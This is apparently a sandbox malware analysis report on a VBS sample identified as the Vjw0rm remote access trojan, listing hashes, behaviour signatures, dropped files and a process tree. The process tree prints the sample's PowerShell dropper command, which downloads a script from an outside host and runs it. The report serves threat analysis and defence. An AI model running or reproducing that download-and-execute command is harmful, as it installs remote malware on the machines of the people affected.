Overview

overview

10

Static

static

NS882992019101.vbs

windows7_x64

10

NS882992019101.vbs

windows10_x64

10

Analysis

  • max time kernel
    19s
  • max time network
    64s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    24-08-2021 22:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NS882992019101.vbs

  • Size

    13KB

  • MD5

    1abbd5432118e4de7c696d5d43a7449f

  • SHA1

    49fea89d7fc9f8be3afa2fd1b0ae9b6075c0acbf

  • SHA256

    b4489a7f0467bee2782b5e5cf74763d0c05148a9044092eb79aba7c588f35f99

  • SHA512

    7012990308d3b7e451c65b1bc1e26693a04e1bd63f3c3d735538fbb4e9092d87b3ed323a45231004fcbd3795c11803477d8c1645cf1d2b9c0fc915150161b31f

Score
10/10
vjw0rmtrojanworm

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://7501.nerdpol.ovh/7501/fr.txt

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

    trojanwormvjw0rm
  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NS882992019101.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://7501.nerdpol.ovh/7501/fr.txt','C:\Users\Public\fr.PS1');PowerShell -File C:\Users\Public\fr.PS1
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\fr.PS1
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1500

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    a4fe8979002a3254f3bc8dff34892752

    SHA1

    3464b87acb9357732021902f66ac1d815279c273

    SHA256

    631106dbca49af96d566e0d255943c3431b878feb3434a31f6a5ae4be82c1fae

    SHA512

    43345c12d497ce65e59a084ecb877bc81d102bb519f661607ef1914cd20e2d2b78d391e309053a9258864cf0ffe8866b30bfc7372da170d87d742b3eb9bbd626

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    d889779250d3ea510ed1d00f5f1778cc

    SHA1

    6eb6dd0873322ced516aba3188827041865b898d

    SHA256

    67087b8d8f5c46be47d8c4952702cb15911b8ff86e4a917c9a265b217184c921

    SHA512

    dcaa9f0d907b02306c383271ed3853bf4cdc10cc0b8e56df37e3b4b2391c2279916c054fe1f7a32c831b361e0bf93b80e6d12e0d6cc08eb16955ecb270ca52fc

    Download Submit
  • C:\Users\Public\fr.PS1
    MD5

    5480fceef4e5290938cb0a23955358df

    SHA1

    891c237730a39b36bd443e485d3493f5f7ff68c5

    SHA256

    d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020

    SHA512

    3cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392

    Download Submit
  • memory/1500-70-0x0000000000000000-mapping.dmp
    Download
  • memory/1500-82-0x000000001C4E0000-0x000000001C4E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1500-77-0x0000000002554000-0x0000000002556000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1500-76-0x0000000002550000-0x0000000002552000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1816-60-0x000007FEFB881000-0x000007FEFB883000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1972-65-0x00000000026E0000-0x00000000026E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1972-69-0x000000001B5D0000-0x000000001B5D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1972-68-0x0000000002420000-0x0000000002421000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1972-67-0x0000000002664000-0x0000000002666000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1972-66-0x0000000002660000-0x0000000002662000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1972-64-0x000000001AB60000-0x000000001AB61000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1972-63-0x0000000002000000-0x0000000002001000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1972-61-0x0000000000000000-mapping.dmp
    Download